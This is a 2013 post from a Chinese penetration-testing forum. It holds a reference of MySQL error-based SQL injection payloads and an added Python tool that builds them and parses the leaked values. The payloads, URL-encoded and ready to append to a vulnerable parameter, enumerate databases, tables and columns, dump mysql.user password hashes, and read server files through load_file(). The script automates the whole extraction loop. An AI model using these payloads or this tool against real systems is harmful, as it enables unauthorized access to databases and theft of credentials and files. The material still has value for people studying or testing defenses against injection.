中国网络渗透测试联盟

Title: MySQL Error-Based Injection Reference (pdf)

Author: admin    Time: 2013-7-27 11:00
Title: MySQL Error-Based Injection Reference (pdf)
This post was last edited by Nightmare on 2013-3-17 14:20

MySQL error-based injection reference (pdf), one post a day...

MySql Error Based Injection Reference
[MySQL error-based injection reference]
Author: pnig0s1992
Blog: http://pnig0s1992.blog.51cto.com/
Team: http://www.FreeBuf.com/
Tested on MySQL 5.0.91; works on the great majority of 5.x versions.
A small number of versions throw an error when name_const() is used; on those, use the Method.2 payload given for each step.
In the payloads below, + stands for a URL-encoded space and n is a 0-based row offset. Method.1 leaks the value through a "Duplicate column name '<value>'" error (two derived tables whose single column is named by name_const()); Method.2 leaks it through a "Duplicate entry '<value>' for key ..." error from the floor(rand(0)*2) GROUP BY trick.

Query the version:
Method.1: and+exists(select*from+(select*from(select+name_const(@@version,0))a+join+(select+name_const(@@version,0))b)c)
Method.2: and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+group+by+a)b)

Query the current user:
Method.1: and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
Method.2: and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Query the current database:
Method.1: and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
Method.2: and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Enumerate databases one by one:
and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c)
Replace n with 0, 1, 2, ... in turn.

Number of tables in a given database:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+table_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
0x6D7973716C = mysql

Enumerate tables one by one:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+table_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
0x6D7973716C = mysql; replace n with 0, 1, 2, ... in turn.

Number of columns in a table:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
0x6D7973716C = mysql, 0x636F6C756D6E735F70726976 = columns_priv

Enumerate columns one by one:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Replace n with 0, 1, 2, ... in turn.

Enumerate row contents one by one:
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Replace n with 0, 1, 2, ... in turn.

Dump file contents:
and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a+from+information_schema.tables+group+by+a)b)
0x433A5C5C746573742E617361 = C:\\test.asa (the path used in the payload above); 0x433A5C5C626F6F742E696E69 = C:\\boot.ini. load_file() requires the FILE privilege. Because the duplicate-entry error only shows 64 bytes of the key, use substring() to choose which bytes are displayed and walk through the file window by window.
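The following Python is an added example for the whole procedure above; it is not part of the original reference and not pnig0s1992's code. It builds both the Method.1 (name_const) and Method.2 (floor(rand(0)*2) GROUP BY) payloads for each enumeration step, writes hex literals the way the page does so no quotes are needed, and parses the server's error text to recover the leaked value, handling both the MySQL 5.0 message form ("for key 1") and the 5.1+ form ("for key 'group_key'"). It assumes an injectable numeric GET parameter to which the payload is appended and a server that reflects the MySQL error; the error strings used to exercise it are constructed, not captured from a real target.

```python
"""
Payload builder and error parser for MySQL error-based (duplicate-entry /
duplicate-column) injection.  Added example; not the original reference's
code.  ASSUMPTIONS: numeric GET parameter (payload appended as "+and+..."),
MySQL error text reflected to the client, sample error strings constructed.
"""
import re
from typing import Optional


def hex_literal(s: str) -> str:
    """MySQL hex string literal (0x...), so the payload contains no quotes."""
    return "0x" + s.encode("utf-8").hex().upper()


def dup_entry_payload(leak_expr: str) -> str:
    """
    Method.2: concat(<value>, floor(rand(0)*2)) used as a GROUP BY key.
    floor(rand(0)*2) is the fixed sequence 0,1,1,0,1,1,... so the key computed
    for the third row collides with the entry inserted for the second row and
    MySQL raises "Duplicate entry '<value>1' for key ...".  The row source
    only has to be a table with at least three rows; information_schema.tables
    always qualifies.  The rand() digit is placed LAST so leaked_value() can
    strip it.
    """
    return (
        "and (select 1 from (select count(*),"
        f"concat(({leak_expr}),floor(rand(0)*2))x "
        "from information_schema.tables group by x)a)"
    )


def name_const_payload(leak_expr: str) -> str:
    """
    Method.1: two derived tables whose only column is named by
    name_const(<value>,0) are joined, giving "Duplicate column name '<value>'".
    Versions that insist on constant arguments to NAME_CONST reject this;
    fall back to dup_entry_payload() there.
    """
    col = f"select name_const(({leak_expr}),0)"
    return f"and exists(select*from (select*from({col})a join ({col})b)c)"


# --- scalar expressions for each enumeration step (n is a 0-based offset) ---
def schema_name(n: int) -> str:
    return f"select schema_name from information_schema.schemata limit {n},1"


def table_name(schema: str, n: int) -> str:
    return ("select table_name from information_schema.tables "
            f"where table_schema={hex_literal(schema)} limit {n},1")


def column_name(schema: str, table: str, n: int) -> str:
    return ("select column_name from information_schema.columns "
            f"where table_schema={hex_literal(schema)} "
            f"and table_name={hex_literal(table)} limit {n},1")


def cell(schema: str, table: str, column: str, n: int) -> str:
    return f"select {column} from {schema}.{table} limit {n},1"


# The duplicate-entry message keeps only the first 64 characters of the key
# and one of them is the rand() digit, so files are read in 63-byte windows.
WINDOW = 63


def file_chunk(path: str, offset: int) -> str:
    """substring() window over load_file(); offset is 1-based as in MySQL."""
    return f"select substring(load_file({hex_literal(path)}),{offset},{WINDOW})"


def as_query_string(payload: str) -> str:
    """Write the payload the way the page does: '+' for every space."""
    return payload.replace(" ", "+")


# MySQL 5.0 prints "for key 1"; 5.1 and later print "for key 'group_key'".
_DUP_ENTRY = re.compile(r"Duplicate entry '(.*)' for key (?:\d+|'[^']*')")
_DUP_COLUMN = re.compile(r"Duplicate column name '(.*)'")


def leaked_value(error_text: str) -> Optional[str]:
    """Recover the leaked value from either error form; None if no match."""
    m = _DUP_COLUMN.search(error_text)
    if m:
        return m.group(1)
    m = _DUP_ENTRY.search(error_text)
    if not m:
        return None
    key = m.group(1)
    # dup_entry_payload() appends the rand() digit and the colliding row is
    # always the one whose digit is 1; drop it.  If the key was truncated at
    # 64 characters the digit is already gone, so nothing is stripped.
    return key[:-1] if key.endswith("1") else key


if __name__ == "__main__":
    print(as_query_string(dup_entry_payload(table_name("mysql", 0))))
    print(as_query_string(name_const_payload("@@version")))
    print(as_query_string(dup_entry_payload(file_chunk(r"C:\\boot.ini", 1))))
    # constructed server response, not captured from a real host
    print(leaked_value("Duplicate entry 'root@localhost1' for key 'group_key'"))
```

Use dup_entry_payload() with schema_name(), table_name(), column_name() and cell() in turn, incrementing n until leaked_value() returns None (the LIMIT window is empty, so concat() yields NULL and no duplicate arises), and read files by stepping the offset of file_chunk() by WINDOW.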
Thx for reading.

You don't have to download it either.





Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2